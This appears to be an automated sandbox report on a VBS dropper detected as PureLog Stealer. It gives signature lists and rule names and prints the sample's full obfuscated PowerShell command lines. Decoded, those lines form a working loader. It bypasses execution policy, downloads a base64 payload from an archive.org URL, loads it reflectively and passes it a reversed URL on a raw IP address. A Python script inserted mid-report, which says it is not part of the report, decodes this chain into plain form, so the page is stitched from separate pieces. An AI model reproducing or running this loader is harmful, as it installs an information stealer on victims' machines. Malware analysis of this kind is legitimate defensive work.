Windows
Analysis Report
0BO4n723Q8.vbs
Overview
General Information
Sample name: | 0BO4n723Q8.vbs (renamed because the original name is a hash value) |
Original sample name: | 35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b.vbs |
Analysis ID: | 1523824 |
MD5: | 19f9fc1579433299ad398e80b01f4137 |
SHA1: | f1ebb5f2428d32d75b5c76da93ae9f776f95303a |
SHA256: | 35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b |
Tags: | BlindEagle, vbs, user-JAMESWT_MHT |
Detection
PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7500 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 7584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
    - conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 7744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
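The three PowerShell layers in the tree above can be peeled offline. The script below is an added analysis helper, not part of the Joe Sandbox report or of the sample: it decodes the base64 literal from the PID 7584 command line, joins the 'a'+'b' fragments and applies the two .REPlAce() calls that the PID 7744 command line performs at run time, resolves the $eNv:ComSpeC[4,24,25]-join'' trick against an assumed stock %ComSpec% (C:\Windows\system32\cmd.exe), and pulls the stage-2 URL, the reflective entry point and the reversed argument out of the resulting loader. The base64 is transcribed from the report in the 10-character groups it is rendered in; nothing is downloaded or executed.

```python
"""Peel the PowerShell chain from the process tree above (added example, not report content).
Layer 1 (PID 7584) carries a base64 literal; layer 2 (PID 7744) builds the loader from
'a'+'b' fragments plus two .REPlAce() calls; layer 3 is that loader. Text only, no execution."""
import base64
import re

# Base64 literal transcribed from the PID 7584 command line, in the 10-character
# groups the report renders it in; the groups are joined before decoding.
B64_GROUPS = """
JiAoICRlTn Y6Q29tU3Bl Q1s0LDI0LD I1XS1qb2lu JycpICgoJz c5JysnZHVy bCA9JysnIE txamh0Jysn
dHBzJysnOi 8vaWE2MDAx MDAuJysndX MuJysnYXJj aGl2ZS5vcm cvJysnMjQv aXRlbXMvZG UnKyd0YWgt
bm90ZS12L0 RlJysndGFo TicrJ290ZS crJ1YudHh0 S3FqJysnOz cnKyc5ZGJh c2U2NENvbn RlbicrJ3Qg
JysnPScrJy AoTmV3LU9i amVjdCBTeX N0ZW0uTmV0 LlcnKydlYi crJ0NsaWUn KydudCkuRG 93bmxvYScr
J2RTdHJpbm coNzlkdScr J3JsKTs3Jy snOWRiaW5h JysncnknKy dDb250Jysn ZW50ID0nKy cgJysnW1N5
Jysnc3RlbS 5DbycrJ24n Kyd2ZXJ0Jy snXTo6Jysn RnJvbUJhc2 UnKyc2Jysn NFN0cmluZy gnKyc3Jysn
OWRiYXNlNj RDb250ZW50 KTs3JysnOW QnKydhc3Nl bWInKydseS A9IFtSJysn ZWYnKydsJy snZWN0aScr
J29uLkEnKy dzJysnc2Vt Ymx5XTo6TG 9hZCg3OWRi aW5hcicrJ3 lDbycrJ250 ZW50KScrJz snKyc3OScr
J2R0eXBlID 0nKycgNzlk JysnYXNzZW 1ibCcrJ3ku R2V0VCcrJ3 lwZShLJysn cWonKydSJy sndW5QRScr
Jy5Ib21lJy snS3FqKTsn Kyc3OWRtJy snZXRob2Qg PSAnKyc3OW R0eScrJ3An KydlLkcnKy dldE1ldGhv
JysnZCgnKy dLcScrJ2on KydWQUlLcS crJ2opOzc5 ZG1ldGhvZC 5JbnZvJysn a2UoNzlkJy snbnUnKyds
bCwnKycgW2 9iamVjJysn dFtdXScrJ0 AoS3FqJysn dHgnKyd0Lk hUT01SLzAz MS84NDIuOD QxLjI3MS43
MDEvLycrJz pwdHRoSycr J3FqICwgS3 FqJysnZGUn KydzYXRpdi crJ2Fkb0tx aiAsIEtxam Rlc2F0aXZh
ZCcrJ29LcW onKycgLCBL cWpkZScrJ3 NhdGl2YWRv S3FqLEtxal JlZ0EnKydz bUtxaicrJy wnKydLJysn
cWpLcScrJ2 onKycpKScp LlJFUGxBY2 UoKFtjaGFy XTU1K1tjaG FyXTU3K1tj aGFyXTEwMC ksJyQnKS5S
RVBsQWNlKC hbY2hhcl03 NStbY2hhcl 0xMTMrW2No YXJdMTA2KS xbc3RySW5n XVtjaGFyXT M5KSAp
"""
LAYER1 = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command '
    "$Codigo = '" + "".join(B64_GROUPS.split()) + "';"
    "$OWjuxd = [system.Text.encoding]::UTF8.GetString("
    "[system.Convert]::Frombase64String($codigo));"
    "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
)
# Assumed %ComSpec% on the w10x64 sandbox; the three indexed characters are the same
# on every stock Windows install, so the index trick always spells the same verb.
COMSPEC = r"C:\Windows\system32\cmd.exe"


def decode_layer1(cmdline: str) -> str:
    """Pull the long single-quoted base64 literal out of -command and decode it."""
    m = re.search(r"\$\w+\s*=\s*'([A-Za-z0-9+/=]{40,})'", cmdline)
    if not m:
        raise ValueError("no base64 literal in command line")
    return base64.b64decode(m.group(1)).decode("utf-8")


def ps_chars(expr: str) -> str:
    """Evaluate a .REPlAce() argument: a 'literal' or a sum of [char]N casts."""
    lit = re.fullmatch(r"\s*'([^']*)'\s*", expr)
    if lit:
        return lit.group(1)
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", expr, re.I))


def resolve_comspec_verb(layer2: str) -> str:
    """$eNv:ComSpeC[4,24,25]-join'' indexes %ComSpec% to spell the command being invoked."""
    m = re.search(r"\$env:comspec\[([\d,]+)\]\s*-join\s*''", layer2, re.I)
    return "".join(COMSPEC[int(i)] for i in m.group(1).split(",")) if m else ""


def decode_layer2(layer2: str) -> str:
    """Join the 'a'+'b' fragments, then apply the trailing .REPlAce() calls in order."""
    body = re.search(r"\(\((.*?)\)\.replace\(", layer2, re.I | re.S).group(1)
    script = "".join(re.findall(r"'([^']*)'", body))
    for needle, repl in re.findall(r"\.replace\(\(([^)]*)\),(.*?)\)", layer2, re.I):
        script = script.replace(ps_chars(needle), ps_chars(repl))
    return script


def unreverse(s: str) -> str:
    """Undo the reversed-URL trick ('...//:ptth') that the Sigma rule above keys on."""
    r = s[::-1]
    return r if r.lower().startswith(("http://", "https://")) else s


def extract_iocs(script: str) -> dict:
    """Stage-2 fetch, reflective entry point and RunPE arguments from the plain loader."""
    url = re.search(r"\$\w+\s*=\s*'(https?://[^']+)'", script).group(1)
    type_name = re.search(r"\.GetType\('([^']+)'\)", script).group(1)
    method = re.search(r"\.GetMethod\('([^']+)'\)", script).group(1)
    args_body = re.search(r"@\((.*?)\)\)", script, re.S).group(1)
    return {
        "stage2_url": url,
        "entry": f"{type_name}.{method}",
        "runpe_args": [unreverse(a) for a in re.findall(r"'([^']*)'", args_body)],
        "reflective_load": "[Reflection.Assembly]::Load" in script,
    }


def peel(cmdline: str) -> dict:
    """Full chain: layer 1 -> layer 2 -> layer 3 -> IOCs, plus the verb the loader is fed to."""
    layer2 = decode_layer1(cmdline)
    script = decode_layer2(layer2)
    result = extract_iocs(script)
    result.update(invoker=resolve_comspec_verb(layer2), script=script)
    return result
```

`peel(LAYER1)` returns the clean loader together with the download URL on archive.org, the `RunPE.Home.VAI` entry point reached through `[Reflection.Assembly]::Load`, the verb spelled out of %ComSpec%, and the RunPE argument list with the reversed first element restored. The `-executionpolicy bypass`, `FromBase64String` and `//:ptth` patterns that several of the listed Sigma rules key on are all visible in the intermediate layers the functions return.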
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |